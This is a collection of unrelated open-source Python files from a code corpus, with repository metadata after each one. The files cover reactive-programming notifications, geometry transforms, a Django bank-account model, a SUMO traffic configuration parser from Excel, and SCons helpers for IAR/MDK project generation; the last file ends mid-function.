correct_prediction_ = self.sess.run(
self.correct_prediction,
feed_dict=self.eval_feed(self.Input.eval_data[i*50:i*50+50],
self.Input.eval_labels[i*50:i*50+50]))
correct_prediction.append(correct_prediction_)
accuracy = np.mean(correct_prediction)
print "accuracy %f" % accuracy
|
pianomania/cifar10
|
trainer.py
|
Python
|
mit
| 4,648
|
from abc import abstractmethod
from typing import Any, Callable, Generic, Optional, TypeVar, Union
from reactivex import abc, typing
from reactivex.scheduler import ImmediateScheduler
from .observable import Observable
from .observer import Observer
_T = TypeVar("_T")
class Notification(Generic[_T]):
"""Represents a notification to an observer."""
def __init__(self) -> None:
"""Default constructor used by derived types."""
self.has_value = False
self.value: Optional[_T] = None
self.kind: str = ""
def accept(
self,
on_next: Union[typing.OnNext[_T], abc.ObserverBase[_T]],
on_error: Optional[typing.OnError] = None,
on_completed: Optional[typing.OnCompleted] = None,
) -> None:
"""Invokes the delegate corresponding to the notification or an
observer and returns the produced result.
Examples:
>>> notification.accept(observer)
>>> notification.accept(on_next, on_error, on_completed)
Args:
on_next: Delegate to invoke for an OnNext notification.
on_error: [Optional] Delegate to invoke for an OnError
notification.
on_completed: [Optional] Delegate to invoke for an
OnCompleted notification.
Returns:
Result produced by the observation."""
if isinstance(on_next, abc.ObserverBase):
return self._accept_observer(on_next)
return self._accept(on_next, on_error, on_completed)
@abstractmethod
def _accept(
self,
on_next: typing.OnNext[_T],
on_error: Optional[typing.OnError],
on_completed: Optional[typing.OnCompleted],
) -> None:
raise NotImplementedError
@abstractmethod
def _accept_observer(self, observer: abc.ObserverBase[_T]) -> None:
raise NotImplementedError
def to_observable(
self, scheduler: Optional[abc.SchedulerBase] = None
) -> abc.ObservableBase[_T]:
"""Returns an observable sequence with a single notification,
using the specified scheduler, else the immediate scheduler.
Args:
scheduler: [Optional] Scheduler to send out the
notification calls on.
Returns:
An observable sequence that surfaces the behavior of the
notification upon subscription.
"""
_scheduler = scheduler or ImmediateScheduler.singleton()
def subscribe(
observer: abc.ObserverBase[_T],
scheduler: Optional[abc.SchedulerBase] = None,
) -> abc.DisposableBase:
def action(scheduler: abc.SchedulerBase, state: Any):
self._accept_observer(observer)
if self.kind == "N":
observer.on_completed()
__scheduler = scheduler or _scheduler
return __scheduler.schedule(action)
return Observable(subscribe)
def equals(self, other: "Notification[_T]") -> bool:
"""Indicates whether this instance and a specified object are
equal."""
other_string = "" if not other else str(other)
return str(self) == other_string
def __eq__(self, other: Any) -> bool:
return self.equals(other)
class OnNext(Notification[_T]):
"""Represents an OnNext notification to an observer."""
def __init__(self, value: _T):
"""Constructs a notification of a new value."""
super(OnNext, self).__init__()
self.value: _T = value
self.has_value: bool = True
self.kind: str = "N"
def _accept(
self,
on_next: typing.OnNext[_T],
on_error: Optional[typing.OnError] = None,
on_completed: Optional[typing.OnCompleted] = None,
) -> None:
return on_next(self.value)
def _accept_observer(self, observer: abc.ObserverBase[_T]) -> None:
return observer.on_next(self.value)
def __str__(self) -> str:
val: Any = self.value
if isinstance(val, int):
val = float(val)
return "OnNext(%s)" % str(val)
class OnError(Notification[_T]):
"""Represents an OnError notification to an observer."""
def __init__(self, error: Union[Exception, str]):
"""Constructs a notification of an exception."""
super(OnError, self).__init__()
self.exception: Exception = (
error if isinstance(error, Exception) else Exception(error)
)
self.kind = "E"
def _accept(
self,
on_next: typing.OnNext[_T],
on_error: Optional[typing.OnError],
on_completed: Optional[typing.OnCompleted],
) -> None:
return on_error(self.exception) if on_error else None
def _accept_observer(self, observer: abc.ObserverBase[_T]):
return observer.on_error(self.exception)
def __str__(self) -> str:
return "OnError(%s)" % str(self.exception)
class OnCompleted(Notification[_T]):
"""Represents an OnCompleted notification to an observer."""
def __init__(self):
"""Constructs a notification of the end of a sequence."""
super(OnCompleted, self).__init__()
self.kind = "C"
def _accept(
self,
on_next: typing.OnNext[_T],
on_error: Optional[typing.OnError],
on_completed: Optional[typing.OnCompleted],
) -> None:
return on_completed() if on_completed else None
def _accept_observer(self, observer: abc.ObserverBase[_T]):
return observer.on_completed()
def __str__(self) -> str:
return "OnCompleted()"
def from_notifier(handler: Callable[[Notification[_T]], None]) -> Observer[_T]:
"""Creates an observer from a notification callback.
Args:
handler: Action that handles a notification.
Returns:
The observer object that invokes the specified handler using
a notification corresponding to each message it receives.
"""
def _on_next(value: _T) -> None:
return handler(OnNext(value))
def _on_error(error: Exception):
return handler(OnError(error))
def _on_completed():
return handler(OnCompleted())
return Observer(_on_next, _on_error, _on_completed)
|
ReactiveX/RxPY
|
reactivex/notification.py
|
Python
|
mit
| 6,251
|
from typing import Any, Optional
from reactivex import Observable, abc
from reactivex.disposable import Disposable
def never_() -> Observable[Any]:
"""Returns a non-terminating observable sequence, which can be used
to denote an infinite duration (e.g. when using reactive joins).
Returns:
An observable sequence whose observers will never get called.
"""
def subscribe(
observer: abc.ObserverBase[Any], scheduler: Optional[abc.SchedulerBase] = None
) -> abc.DisposableBase:
return Disposable()
return Observable(subscribe)
__all__ = ["never_"]
|
ReactiveX/RxPY
|
reactivex/observable/never.py
|
Python
|
mit
| 605
|
from math import sin, cos, pi, degrees, radians, atan2
from point import Point
from line import Line
from arc import Arc
from circle import Circle
from polyline import Polyline
from block import Block
from vector import Vector
from affinematrix import AffineMatrix
def rotateAboutPoint(geom, p, radianAngle):
'''
rotates geometic entity about a point
'''
a1 = AffineMatrix().Z_rotation(radianAngle)
a2 = AffineMatrix().translation(Vector(p.x,p.y,p.z))
a3 = AffineMatrix().translation(Vector(-p.x,-p.y,-p.z))
geom2 = a2*a1*a3*geom # translate to origin, rotate, translate back (in new frame)
return geom2
def mirrorAboutLine(geom, l):
'''
mirror geometric entity about a line
'''
# this is the same as a 180 degree rotation about the line in 3D!
v_shift = Vector(l.startPoint.x,l.startPoint.y,l.startPoint.z)
#print "v_shift = %s" % str(v_shift)
#print "-1.0 * v_shift = %s" % str(-1.0 * v_shift)
v_axis = Vector(l.endPoint.x - l.startPoint.x,
l.endPoint.y - l.startPoint.y,
l.endPoint.z - l.startPoint.z)
#print "v_axis = %s" % str(v_axis)
tmshift = AffineMatrix().translation(-1.0 * v_shift)
tpshift = AffineMatrix().translation(v_shift)
y = l.endPoint.y - l.startPoint.y
x = l.endPoint.x - l.startPoint.x
theta = atan2(y,x)
trot1 = AffineMatrix().Z_rotation(-theta)
trot2 = AffineMatrix().Z_rotation(theta)
tflip = AffineMatrix([[1.0, 0.0, 0.0, 0.0], [0.0, -1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0], [0.0, 0.0, 0.0, 1.0]])
#trot = AffineMatrix().rotationAboutVector(pi, v_axis)
#geom_out = tpshift * trot * tmshift * geom # translate to origin, perform rotation, and translate back
geom_out = tpshift * trot2 * tflip * trot1 * tmshift * geom
return geom_out
def polarArray(geom,numberOfCopies,totalAngle=2*pi,center=Point(0,0)):
'''
array geometric entity in a polar pattern
'''
b = Block()
theta_step = totalAngle / numberOfCopies
theta = 0.0
for i in range(numberOfCopies):
g = rotateAboutPoint(geom,center,theta)
b.append(g)
theta += theta_step
return b
def rectArray(geom,xNum,xStep,yNum=1,yStep=None):
'''
array geometric entity in a rectangular pattern
'''
b = Block()
y = 0.0
for j in range(yNum):
x = 0.0
for i in range(xNum):
t = AffineMatrix().translation(Vector(x,y,0.0))
b.append(t * geom)
x += xStep
y += yStep
return b
if __name__=="__main__":
p0 = Point()
p1 = Point(1,1)
p2 = Point(2,1)
#print rotateAboutPoint(p1,p0,radians(45))
#print rotateAboutPoint(p1,p2,radians(180))
l1 = Line(p1,p2)
l2 = rotateAboutPoint(l1, p1, radians(30))
l3 = mirrorAboutLine(l2,l1)
l4 = mirrorAboutLine(l1,l2)
l5 = Line(Point(5,5),Point(6,5))
b = polarArray(l5,50,center = Point(5,5))
from fileformats.render2dxf import Render2DXF
r = Render2DXF()
q = [l1,l2,l3,l4]
q += b.seq
print q
#r.render2File(q,'testpattern.dxf')
r.render(q)
print r.d.entities
|
gfsmith/gears
|
gears/geometry/twod_operations.py
|
Python
|
mit
| 3,114
|
import OOMP
newPart = OOMP.oompItem(9579)
newPart.addTag("oompType", "VREG")
newPart.addTag("oompSize", "SO89")
newPart.addTag("oompColor", "X")
newPart.addTag("oompDesc", "V33D")
newPart.addTag("oompIndex", "A1")
OOMP.parts.append(newPart)
|
oomlout/oomlout-OOMP
|
old/OOMPpart_VREG_SO89_X_V33D_A1.py
|
Python
|
cc0-1.0
| 243
|
import OOMP
newPart = OOMP.oompItem(8804)
newPart.addTag("oompType", "CAPC")
newPart.addTag("oompSize", "0402")
newPart.addTag("oompColor", "X")
newPart.addTag("oompDesc", "PF18")
newPart.addTag("oompIndex", "V50")
OOMP.parts.append(newPart)
|
oomlout/oomlout-OOMP
|
old/OOMPpart_CAPC_0402_X_PF18_V50.py
|
Python
|
cc0-1.0
| 244
|
# coding=utf-8
from descriptor_tools import get_descriptor
__author__ = 'Jake'
__all__ = ['name_of', 'id_name_of']
def name_of(descriptor, owner):
"""
Given a descriptor and a class that the descriptor is stored on, returns
the name of the attribute the descriptor is stored under.
Also works if the given class is a subclass of the class that *actually*
has the descriptor attribute
:param descriptor: descriptor the name is being looked up for
:param owner: class that "owns" the descriptor
:return: the name the descriptor is stored under on *owner*
"""
name = _first(attr for attr in dir(owner)
if (get_descriptor(owner, attr) is descriptor))
if name is None:
raise RuntimeError(
str.format(
"The descriptor, '{}', does not exist on type, '{}'",
descriptor,
owner.__qualname__))
return name
def _first(iter):
return next(iter, None)
def id_name_of(descriptor):
"""
Returns a string of the hexidecimal version of *descriptor*'s id,
sans the leading '0'. So, it'll be something like 'xf8e8aa97'. It
removes the 0 so that it will start with an alpha character,
allowing it to still be a proper Python identifier, which keeps it
from breaking `dir()`
:param descriptor: descriptor to generate the name for/from
:return: a generated name for the given descriptor
"""
return hex(id(descriptor))[1:]
|
sad2project/descriptor-tools
|
src/descriptor_tools/names.py
|
Python
|
cc0-1.0
| 1,493
|
# -*- coding: utf-8 -*-
from django.db import models
from gestao.financeiro.models.basico.Banco import Banco
class ContaDeBanco(models.Model):
agencia = models.CharField(verbose_name="Agência", max_length=10)
conta_corrente = models.CharField(verbose_name="Conta Corrente", max_length=15)
operacao = models.CharField(verbose_name="Operação", max_length=5, null=True, blank=True)
banco = models.ForeignKey(Banco, verbose_name="Banco")
def __unicode__(self):
return u'BANCO: %s, AG: %s, CC: %s' % (self.banco, self.agencia, self.conta_corrente)
class Meta:
app_label = 'financeiro'
verbose_name = 'Conta do Banco'
verbose_name_plural = 'Contas de Banco'
unique_together = ("agencia", "conta_corrente", "banco")
|
marcospereirampj/gestao_empresarial
|
gestao/financeiro/models/basico/ContaDeBanco.py
|
Python
|
cc0-1.0
| 822
|
class Spark(UsableAbility):
def __init__(self, owner):
super().__init__()
self.owner = owner
self.ability_attr["name"] = "Spark"
self.ability_attr["magic_type"] = "electric"
self.ability_attr["lvl"] = 1
self.ability_attr["cost"] = 20
self.ability_attr["cost_type"] = "mp"
self.ability_attr["cast_time"] = 0.5
self.ability_attr["range"] = 500
self.ability_attr["hit_range"] = 50
self.use_effect = "Electric 9"
self.use_effect_scale = 1.0
self.target_effects_base["dmg"] = 150
self.target_effects_base["dmg_type"] = self.ability_attr["magic_type"]
self.target_effects = dict()
self.apply_modifiers()
def custom_action(self, target):
dist = get_dist(self.owner.x, self.owner.y, *target)
if dist <= self.ability_attr["range"]:
if self.do_cost():
animpos = self.owner.window.get_windowpos(
*target, precise=True
)
self.owner.window.animator.spawn_anim(
self.use_effect, animpos, scale=self.use_effect_scale
)
for e in self.owner.game.enemies:
dist = get_dist(*target, e.x, e.y)
if dist <= self.ability_attr["hit_range"]:
dmgscale = 1.0 - dist / self.ability_attr["hit_range"] * 0.75
eff = self.target_effects.copy()
eff["dmg"] = self.target_effects["dmg"] * dmgscale
e.do_effect(eff)
|
NiclasEriksen/rpg_procgen
|
ability_files/spark.py
|
Python
|
cc0-1.0
| 1,604
|
from setuptools import setup, find_packages
setup(name='BIOMD0000000388',
version=20140916,
description='BIOMD0000000388 from BioModels',
url='http://www.ebi.ac.uk/biomodels-main/BIOMD0000000388',
maintainer='Stanley Gu',
maintainer_url='stanleygu@gmail.com',
packages=find_packages(),
package_data={'': ['*.xml', 'README.md']},
)
|
biomodels/BIOMD0000000388
|
setup.py
|
Python
|
cc0-1.0
| 377
|
"""
.. _ts_config_parser:
Excel Configuration Parser Internals
------------------------------------
This module handles all of the excel configuration parsing.
Guidelines on excel sheet formatting is as follows:
+------------------+--------------------+------------------+--------------------+--------------------+
|Column A | Column B |Column C | Column E | Column F |
+==================+====================+==================+====================+====================+
|SUMO Attribute |SUMO File where this|Category name |Units column |Value fot this attr |
| |attribute resides | | | |
+------------------+--------------------+------------------+--------------------+--------------------+
Attributes can only be read from Row 3 and below (MIN_ROW)
Only the first 1000 rows can have any attributes (MAX_ROW)
Current supported tabs:
* Vehicle Type Customization
* General Settings
* Intersection Definition
* Branch Settings
Current supported Intersection Types:
* Cross
* T
* Y
Cross intersection has been tested.
"""
from openpyxl import *
import json
import xml.etree.ElementTree as ET
import xml.dom.minidom
SUMO_ATTR_COLUMN = 0 # Column A
SUMO_FILE_COLUMN = 1 # Column B
CATEGORY_COLUMN = 2
UNITS_COLUMN = 4 # Column E
VALUE_COLUMN = 5 # Column F for single entry data
MIN_ROW = 3 # Minimum row number where config information CAN be stored
MAX_ROW = 1000 # Max row where data is stored TODO update?
UNIT_CONVERT = {
"time": {"Hours": 60 * 60, "Days": 60 * 60 * 24,
"Months": 60 * 60 * 24 * 30.41,
"Years": 60 * 60 * 24 * 30.41 * 12}, # How many seconds per time unit
"angle": {"N": 90, "NE": 45, "E": 0, "SE": 315,
"S": 270, "SW": 225, "W": 180, "NW": 135, },
}
# List of file extensions
ROUTE = "rou"
NET = "net"
SUMOFILE = 0
SUMOATTR = 1
USERVAL = 3 # First user_val
VALUNITS = 2
TAB_NAMES = ["Vehicle Type Customization", "General Settings", "Intersection Definition", "Branch Settings"]
ITYPE_BRANCHES = {
"Cross": 4,
"T": 3,
"Y": 3,
}
OUTPUT_DICT = {
"SUMOCFG": {},
"Branches": {},
"Intersections": {},
}
def parse_general(sheet):
"""
Parses the given sheet assuming it is the General Settings sheet
Adds parsed data to OUTPUT_DICT global variable
Parameters
----------
sheet: openpyxl sheet - The General Settings tab
Returns
-------
String - The name of the current configuration
"""
# Get the Configuration name.
input_config_name = get_input_from_row(sheet, MIN_ROW) # Configuration Name
# Write Config names to the output dict
if input_config_name[SUMOFILE] == "SUMOCFG" and input_config_name[SUMOATTR] == "input":
config_name = input_config_name[USERVAL]
OUTPUT_DICT["SUMOCFG"]["input"] = {"net_file": "%s.net.xml" % config_name,
"route_files": "%s.rou.xml" % config_name,
"additional_files": "%s.add.xml" % config_name}
else:
print("Config name Error") # TODO fill out
# Simulation length
input_runtime_length = get_input_from_row(sheet, MIN_ROW + 1)
if input_runtime_length[SUMOFILE] == "SUMOCFG" and input_runtime_length[SUMOATTR] == "time.end":
sim_seconds = input_runtime_length[USERVAL] * UNIT_CONVERT["time"][
input_runtime_length[VALUNITS]] # TODO check if units is in time_convert?
OUTPUT_DICT["SUMOCFG"]["time"] = {"begin": "0", "end": "%d" % sim_seconds}
else:
print("TIME ERROR", input_runtime_length) # TODO fill out
OUTPUT_DICT["SUMOCFG"]["gui_only"] = {"gui_settings_file": "gui-settings.cfg"}
# Overall Traffic Demand
# TODO Where does this go in the xmls if anywhere?
# input_traffic_demand = get_input_from_row(sheet, MIN_ROW+2)
return config_name
def parse_intersection(sheet):
"""
Parses the given sheet assuming it is the Intersections sheet
Adds parsed data to OUTPUT_DICT global variable
Parameters
----------
sheet: openpyxl sheet - The General Intersection Settings tab
Returns
-------
String - The selected intersection type. Key in ITYPE_BRANCHES
"""
# Intersection type (Cross, T, Y, etc)
input_intersection_type = get_input_from_row(sheet, MIN_ROW)
intersection_type = input_intersection_type[USERVAL]
if intersection_type not in ITYPE_BRANCHES.keys():
print("Unrecognized Intersection type: %s" % intersection_type)
return None
OUTPUT_DICT["Intersections"]["I0"] = {}
# TODO Add in support for multiple intersections.
# Initialize the intersection in The output Dict
intersection_name = "I%d" % 0
OUTPUT_DICT["Intersections"][intersection_name]["id"] = 0
OUTPUT_DICT["Intersections"][intersection_name]["type"] = "traffic_light"
return intersection_type
def parse_branches(sheet, intersection_type):
"""
Parses the given sheet assuming it is the branches sheet
Fills out OUTPUT_DICT with all information needed to parse the branches of the intersection.
Parameters
----------
sheet: openpyxl sheet - The General Branches Settings tab
intersection_type: - enum specified in ITYPE_BRANCHES specifying the current intersection type (i.e cross, T, Y)
Returns
-------
None
"""
# Get the number of branches
num_branches = ITYPE_BRANCHES[intersection_type]
# Initialize the output dictionary with the branches
for branch_num in range(1, num_branches + 1):
b_name = "B%d" % branch_num # Branch name is Bn where n is the branches ID
OUTPUT_DICT["Branches"][b_name] = {}
for row in range(MIN_ROW, MAX_ROW): # For each row that may contain data
if row_has_data(sheet, row): # Check if this row has data
input_data = get_input_from_row(sheet, row, num_branches) # Get the data
units = input_data[VALUNITS].lower()
# Fill out OUTPUT_DICT with data from each branch for this attribute
for branch_num in range(0, num_branches):
b_name = "B%d" % (branch_num + 1)
user_value = input_data[USERVAL + branch_num]
if units in UNIT_CONVERT.keys():
user_value = UNIT_CONVERT[units][user_value]
# TODO normalize the data using the units
# TODO verify inbound lanes sum up to numLanes
# write to output
OUTPUT_DICT["Branches"][b_name][input_data[SUMOATTR]] = user_value
def parse_stats(sheet):
"""
Parses the given sheet assuming it is the advanced customization sheet
The parsed data is stored as a xml.etree.ElementTree element.
This becomes the stats file for SUMO
Parameters
----------
sheet: The advanced customization sheet
Returns
-------
"xml.etree.ElementTree" node containing the full statistics file information
"""
# TODO Bus Stops is not currently supported.
category_translate = {"Work Hours": "workHours", "City Gates": "cityGates",
"Bus Stations": "busStations", "Bus Lines": "busLines"}
expected_entries = {"bracket": 3, "opening": 2, "closing": 2, "street": 3, "entrance": 4,
"school": 7, "busStation": 3}
sub_tags = {"population": "bracket", "workHours": "opening", "streets": "street", "cityGates": "entrance",
"schools": "school",
"busStations": "busStation"}
root = ET.Element("city")
current_category = None
category_root = None
data = None
num_entries = 15 # Maximum number of entries for any category TODO global
for row in range(MIN_ROW, 100):
# prettyprint(root)
if row_has_category(sheet, row) is not None:
# If a category has been parsed, put it in the xml
if data is not None:
for tag in data.keys():
attributes = data[tag]
if "TAG" in attributes.keys():
sub_tag = attributes["TAG"].lower()
del attributes["TAG"]
else:
sub_tag = tag.split("_")[0]
if sub_tag in expected_entries.keys() and len(attributes) < expected_entries[sub_tag]:
continue
ET.SubElement(category_root, sub_tag, attrib={attr: str(attributes[attr]) for attr in attributes})
# prettyprint(root)
current_category = row_has_category(sheet, row)
if current_category in category_translate.keys():
current_category = category_translate[current_category]
else:
current_category = current_category.lower().strip(" ")
category_root = ET.SubElement(root, current_category)
data = None
continue
elif category_root is None:
continue
if current_category in ["general", "parameters"]:
if row_has_data(sheet, row):
input_data = get_input_from_row(sheet, row, cols=1)
category_root.attrib[input_data[SUMOATTR]] = str(input_data[USERVAL])
elif current_category in ["population", "workHours", "streets", "cityGates", "schools", "busStations"]:
sub_tag = sub_tags[current_category]
if row_has_data(sheet, row):
input_data = get_input_from_row(sheet, row, cols=100)
if data is None:
data = {"%s_%d" % (sub_tag, i): {} for i in range(0, num_entries)}
for i in range(0, len(input_data) - 3):
attribute = input_data[SUMOATTR]
if attribute == "edge2": # Deal with inbound/outbound attributes since sumo uses i and o notation
data["%s_%d" % (sub_tag, i)]["edge"] += {"Inbound": "i", "Outbound": "o"}[
input_data[USERVAL + i]]
else:
data["%s_%d" % (sub_tag, i)][attribute] = str(input_data[USERVAL + i])
# Workhours is implicitly supported
# elif current_category == "workHours":
# pass
return root
def prettyprint(root, print_it=False, supress_errors=True):
"""
Attempts to create a human readable string out of a given xml STRING
Parameters
----------
root: String containing valid xml data
print_it: Tells the function whether or not it should also print out the xml
supress_errors: Tells the function to NOT print out errors if given data was invalid
Returns
-------
String containing the formatted xml data if possible
"""
try:
xml1 = xml.dom.minidom.parseString(ET.tostring(root, encoding='utf8', method='xml').decode())
formatted_xml = xml1.toprettyxml()
if print_it:
print(formatted_xml)
return ET.tostring(formatted_xml, encoding='utf8', method='xml')
except Exception as e:
if supress_errors is False:
print(e)
print('Function "prettyprint()" received invalid xml data')
# print(root)
def row_has_data(sheet, row_num):
"""
Checks whether or not this row contains a user-entered value.
Parameters
----------
sheet: openpyxl sheet - The sheet to use
row_num: The row to analyze
Returns
-------
True if there is data to be analyzed
False otherwise
"""
# Get the data from the row
rows = sheet.iter_rows(min_col=1, min_row=row_num, max_col=15, max_row=row_num)
for row in rows: # FIXME Is there a better way to look at just 1 row
# if there is no SUMO Attribute specified, then there is no user entered data available
sumo_attr = row[SUMO_ATTR_COLUMN].value
if sumo_attr is None:
return False
else:
return True
# should not be executed
print("ERROR - row_has_data() did not find row")
return False
def row_has_category(sheet, row_num):
"""
Checks to see if this row starts a new category
Parameters
----------
sheet: openpyxl sheet - The sheet to use
row_num: The row to analyze
Returns
-------
True if there is a new category
False otherwise
"""
# Get the data from the row
rows = sheet.iter_rows(min_col=1, min_row=row_num, max_col=15, max_row=row_num)
for row in rows: # FIXME Is there a better way to look at just 1 row
# If there is text in the Category Column then it is a new category
class_name = row[CATEGORY_COLUMN].value
if class_name is None:
return None
else:
return class_name
# should not be executed
print("ERROR - row_has_category() did not find any rows")
return None
def get_input_from_row(sheet, row_num, cols=1):
"""
Retrieves the input from the row and returns a tuple of all the relevant data
Parameters
----------
sheet: The sheet to read
row_num: The row number to use
cols: The number of columns to the RIGHT of row_num to return
Returns
-------
Tupple containing the data -
formatted as (sumo_file, sumo_attribute, units, user_val1, user_val2...)
"""
output = []
rows = sheet.iter_rows(min_col=1, min_row=row_num, max_col=VALUE_COLUMN + cols, max_row=row_num)
for row in rows:
# Determine the SUMO_FILE attribute
sumo_file = row[SUMO_FILE_COLUMN].value
if sumo_file is None: sumo_file = "N/A"
output.append(sumo_file)
# Determine the SUMO_ATTR attribute
sumo_attr = row[SUMO_ATTR_COLUMN].value
if sumo_attr is None: sumo_attr = "N/A"
output.append(sumo_attr)
# Determine the units
units = row[UNITS_COLUMN].value # TODO check if user entered units
if units is None: units = "N/A"
output.append(units)
# Determine all user entered values
for col in range(VALUE_COLUMN, VALUE_COLUMN + cols):
user_value = row[col].value
if user_value is None: break
output.append(user_value)
return tuple(output)
def run_parser(excel_file_path, outpath):
"""
Main function to actually run the whole parser
Parameters
----------
excel_file_path: FULL file path to the excel sheet
outpath: File to output the temporary json file
Returns
-------
In order:
1) config_name: The name for the current configuation
2) OUTPUT_DICT: python dictionary containing all relevant information
3) Stats file xml
"""
wb = load_workbook(filename=excel_file_path, data_only=True)
config_name = parse_general(wb["General Settings"])
type = parse_intersection(wb["Intersection Settings"])
if parse_intersection is None:
print("ERROR")
return -1
parse_branches(wb["Branch Settings"], type)
# Context manager to dump parsed config to json
with open(outpath + "/" + config_name + "_parsed.json", 'w') as outfile:
json.dump(OUTPUT_DICT, outfile, indent=4, )
stats_root_node = parse_stats(wb["Advanced Customization"])
stats_xml = xml.dom.minidom.parseString(ET.tostring(stats_root_node, encoding='utf8', method='xml').decode())
return config_name, OUTPUT_DICT, stats_xml.toprettyxml()
if __name__ == "__main__":
run_parser('Configuration_template.xlsx', './test_dir')
|
TrafficSenseMSD/core
|
ts_core/config/parser.py
|
Python
|
epl-1.0
| 15,629
|
###
# Copyright 2011 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
class typednone(object):
'''
A wrapper class for use when calling java overloaded methods and you
need to distinguish which one of the methods to call when the argument
is None. Has the effect of in Java source of (Type)null.
'''
def __init__(self, typedNoneType="java.lang.Object"):
'''Create an instance of a typed none. The argument should be
the name of a Java type suitable to pass to Class.forName()'''
self.typedNoneType = typedNoneType
__hash__ = None
def __eq__(self, other):
return (isinstance(other, self.__class__)
and self.typedNoneType == other.typedNoneType)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(%s)' % (self.__class__.__name__, self.__dict__.__repr__())
class abstractdatasetdescriptor(object):
'''
Use this class to describe an AbstractDataset or ndarray that already resides on disk and can be loaded
using the file loaders. This object is flattened to a flattened representation that is unflattened
by AbstractDatasetHelper.
The unflattened form of this type is an AbstractDataset
'''
def __init__(self, filename=None, deleteAfterLoad=False, index=None, name=None):
'''
Create a new descriptor
Parameters:
filename- the file to load
deleteAfterLoad- true to remove the file once loaded
index- Index of the data set to load if no name is specified
name- Name of the data set to load
If neither name or index is specified, load index 0
'''
self.filename = filename
self.deleteAfterLoad = deleteAfterLoad
self.index = index
self.name = name
#Use this class to wrap a Binary object, typically a str of bytes
import xmlrpclib
binarywrapper = xmlrpclib.Binary
|
erwindl0/python-rpc
|
org.eclipse.triquetrum.python.service/scripts/scisoftpy/python/pywrapper.py
|
Python
|
epl-1.0
| 2,506
|
import os
import sys
import string
import xml.etree.ElementTree as etree
from xml.etree.ElementTree import SubElement
from SCons.Script import *
BuildOptions = {}
Projects = []
Rtt_Root = ''
Env = None
fs_encoding = sys.getfilesystemencoding()
def _get_filetype(fn):
if fn.rfind('.c') != -1 or fn.rfind('.C') != -1 or fn.rfind('.cpp') != -1:
return 1
# assemble file type
if fn.rfind('.s') != -1 or fn.rfind('.S') != -1:
return 2
# header type
if fn.rfind('.h') != -1:
return 5
# other filetype
return 5
def splitall(loc):
"""
Return a list of the path components in loc. (Used by relpath_).
The first item in the list will be either ``os.curdir``, ``os.pardir``, empty,
or the root directory of loc (for example, ``/`` or ``C:\\).
The other items in the list will be strings.
Adapted from *path.py* by Jason Orendorff.
"""
parts = []
while loc != os.curdir and loc != os.pardir:
prev = loc
loc, child = os.path.split(prev)
if loc == prev:
break
parts.append(child)
parts.append(loc)
parts.reverse()
return parts
def _make_path_relative(origin, dest):
"""
Return the relative path between origin and dest.
If it's not possible return dest.
If they are identical return ``os.curdir``
Adapted from `path.py <http://www.jorendorff.com/articles/python/path/>`_ by Jason Orendorff.
"""
origin = os.path.abspath(origin).replace('\\', '/')
dest = os.path.abspath(dest).replace('\\', '/')
#
orig_list = splitall(os.path.normcase(origin))
# Don't normcase dest! We want to preserve the case.
dest_list = splitall(dest)
#
if orig_list[0] != os.path.normcase(dest_list[0]):
# Can't get here from there.
return dest
#
# Find the location where the two paths start to differ.
i = 0
for start_seg, dest_seg in zip(orig_list, dest_list):
if start_seg != os.path.normcase(dest_seg):
break
i += 1
#
# Now i is the point where the two paths diverge.
# Need a certain number of "os.pardir"s to work up
# from the origin to the point of divergence.
segments = [os.pardir] * (len(orig_list) - i)
# Need to add the diverging part of dest_list.
segments += dest_list[i:]
if len(segments) == 0:
# If they happen to be identical, use os.curdir.
return os.curdir
else:
# return os.path.join(*segments).replace('\\', '/')
return os.path.join(*segments)
def xml_indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
xml_indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def IARAddGroup(parent, name, files, project_path):
group = SubElement(parent, 'group')
group_name = SubElement(group, 'name')
group_name.text = name
for f in files:
fn = f.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
basename = os.path.basename(path)
path = _make_path_relative(project_path, path)
path = os.path.join(path, name)
file = SubElement(group, 'file')
file_name = SubElement(file, 'name')
file_name.text = ('$PROJ_DIR$\\' + path).decode(fs_encoding)
iar_workspace = '''<?xml version="1.0" encoding="iso-8859-1"?>
<workspace>
<project>
<path>$WS_DIR$\%s</path>
</project>
<batchBuild/>
</workspace>
'''
def IARWorkspace(target):
# make an workspace
workspace = target.replace('.ewp', '.eww')
out = file(workspace, 'wb')
xml = iar_workspace % target
out.write(xml)
out.close()
def IARProject(target, script):
project_path = os.path.dirname(os.path.abspath(target))
tree = etree.parse('template.ewp')
root = tree.getroot()
out = file(target, 'wb')
CPPPATH = []
CPPDEFINES = []
LINKFLAGS = ''
CCFLAGS = ''
# add group
for group in script:
IARAddGroup(root, group['name'], group['src'], project_path)
# get each include path
if group.has_key('CPPPATH') and group['CPPPATH']:
CPPPATH += group['CPPPATH']
# get each group's definitions
if group.has_key('CPPDEFINES') and group['CPPDEFINES']:
CPPDEFINES += group['CPPDEFINES']
# get each group's link flags
if group.has_key('LINKFLAGS') and group['LINKFLAGS']:
LINKFLAGS += group['LINKFLAGS']
# make relative path
paths = set()
for path in CPPPATH:
inc = _make_path_relative(project_path, os.path.normpath(path))
paths.add(inc) #.replace('\\', '/')
# setting options
options = tree.findall('configuration/settings/data/option')
for option in options:
# print option.text
name = option.find('name')
if name.text == 'CCIncludePath2':
for path in paths:
state = SubElement(option, 'state')
state.text = '$PROJ_DIR$\\' + path
if name.text == 'CCDefines':
for define in CPPDEFINES:
state = SubElement(option, 'state')
state.text = define
xml_indent(root)
out.write(etree.tostring(root, encoding='utf-8'))
out.close()
IARWorkspace(target)
def MDK4AddGroup(ProjectFiles, parent, name, files, project_path):
group = SubElement(parent, 'Group')
group_name = SubElement(group, 'GroupName')
group_name.text = name
for f in files:
fn = f.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
